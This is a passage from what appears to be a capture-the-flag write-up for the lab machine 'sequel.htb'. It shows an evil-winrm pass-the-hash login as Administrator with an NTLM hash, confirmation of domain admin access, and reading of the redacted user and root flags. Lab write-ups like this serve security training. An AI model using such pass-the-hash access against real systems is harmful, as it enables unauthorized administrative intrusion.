$ evil-winrm -i sequel.htb -u 'Administrator' -H '7a8d4e04986afa8ed4060f75e5a0b3ff'
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
Flags
In the Domain Admin shell we can retrieve the user and administrator flags.
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\ryan\Desktop\user.txt
<REDACTED>
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
<REDACTED>